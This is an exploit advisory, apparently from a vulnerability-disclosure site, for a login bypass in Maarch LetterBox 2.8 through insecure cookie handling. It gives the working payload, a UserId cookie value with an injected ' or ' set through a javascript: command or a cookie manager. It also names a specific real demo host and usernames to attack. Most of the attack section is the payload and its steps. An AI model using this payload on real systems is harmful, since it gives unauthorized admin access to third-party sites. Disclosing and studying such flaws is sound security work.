Maarch LetterBox 2.8 Insecure Cookie Handling

2014.11.18

Credit: ZoRLu

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Title : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Date : 17.11.2014
# Demo : http://www.era.sn/courrier
# Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
you first go here:
http://www.target.com/path/index.php?page=welcome.php
you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.
exploit:
javascript:document.cookie = "UserId=[username] ' or '; path=/";
or you edit your cookie's with "Cookies Manager"
name = maarch
contents = UserId=username ' or '
host = your target
path = /script_path/
and dont change other options its keep default.
for demo:
javascript:document.cookie = "UserId=demo ' or '; path=/";
or with Cookies Manager (demo has 2 user demo and demo2 you can test for 2 user)
name = maarch
contents = UserId=demo ' or ' / for other users UserId=demo2 ' or '
host = www.era.sn
path = /
and save it after go here:
http://www.era.sn/courrier/index.php?page=welcome.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Maarch LetterBox 2.8 Insecure Cookie Handling

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.